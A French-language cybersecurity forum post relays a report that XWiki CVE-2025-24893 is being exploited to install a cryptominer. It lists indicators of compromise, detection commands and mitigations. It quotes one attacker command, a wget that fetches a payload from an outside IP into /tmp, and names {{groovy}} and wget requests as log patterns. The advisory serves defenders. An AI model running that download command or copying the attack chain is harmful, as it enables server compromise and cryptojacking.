🔎 Cyberveille

58 readers

3 users here now

Bienvenue dans Cyberveille — un espace de partage et de discussion autour de l’actualité de la cybersécurité francophone, avec un accent suisse 🫕 et européen.

💡 Vocation

Partager les actualités, articles et rapports francophones sur la cybersécurité
Échanger sur les tendances, vulnérabilités, pratiques et outils du domaine
Proposer un espace d’entraide et de conseils : poser une question, demander un avis ou un retour d’expérience en matière de sécurité numérique.

💬 Thèmes principaux

🔐 Infosec · OSINT · Threat intel · Privacy · Blue Team · Sécurité des systèmes d’information · Législation et conformité

~Une partie du contenu provient du projet Cyberveille.ch , une veille francophone sur la cybersécurité gérée par un humain et un bot.~

founded 2 weeks ago

MODERATORS

decio

[VULN] Vulnérabilité XWiki CVE-2025-24893 activement exploitée (self.cyberveille)

submitted 1 week ago by decio to c/cyberveille

0 comments fedilink hide all child comments

⚠️ Vulnérabilité XWiki CVE-2025-24893 activement exploitée

Une faille critique dans XWiki (CVE-2025-24893) est exploitée activement sur internet. Elle permet une injection de template non authentifiée pouvant conduire à l’exécution de code à distance (RCE). Des attaquants s’en servent actuellement pour installer un mineur de cryptomonnaie.

🧩 Ce qui se passe

Selon VulnCheck , leurs “canaries” ont observé une chaîne d’exploitation en deux étapes :

Première étape : L’attaquant dépose un petit script (x640) dans /tmp/. Exemple :

wget http://193.32.208.24:8080/7I2l42wlAe/x640 -O /tmp/11909

Deuxième étape (20 min plus tard) : Il exécute ce script, qui télécharge et lance deux autres (x521 et x522). Ceux-ci installent puis démarrent un mineur de cryptomonnaie appelé tcrond, configuré pour se connecter à c3pool.org.

Le malware nettoie ensuite la machine (historique, processus concurrents, etc.) pour monopoliser les ressources CPU.

🚨 Détails techniques & indicateurs (IOCs)

IPs observées :

123.25.249.88 (Vietnam)
193.32.208.24 (héberge les payloads)

Fichiers et scripts malveillants :

/tmp/11909
x640, x521, x522
binaire : tcrond (mineur UPX-packed)

Hashes connus :

tcrond (UPX): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10 tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f x640: 5abc337dbc04fee7206956dad1e0b6d43921a868

🔍 Vérifications rapides

Sur un serveur XWiki, exécutez :

find /tmp /var/tmp -type f -mtime -2 -ls
ps aux | egrep 'tcrond|xmrig|kinsing|kdevtmpfsi|nanopool'
ss -tunp | egrep '193\.32\.208\.24|123\.25\.249\.88'

⚙️ Si vous trouvez /tmp/11909 ou un binaire tcrond, la machine est probablement compromise. Isolez-la, collectez les journaux, puis réinstallez à partir d’une source propre.

🛡️ Mesures recommandées

Mettre à jour XWiki dès qu’un correctif officiel est disponible.

Restreindre l’accès à /bin/get/Main/SolrSearch via un proxy ou un WAF.

Bloquer les IPs observées (pare-feu, IDS).

Surveiller les logs pour des requêtes contenant {{groovy}} ou wget ... /tmp/.

Sources:

👇

XWiki CVE-2025-24893 Exploited in the Wild

👇

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j

no comments (yet)

sorted by: hot top controversial new old

there doesn't seem to be anything here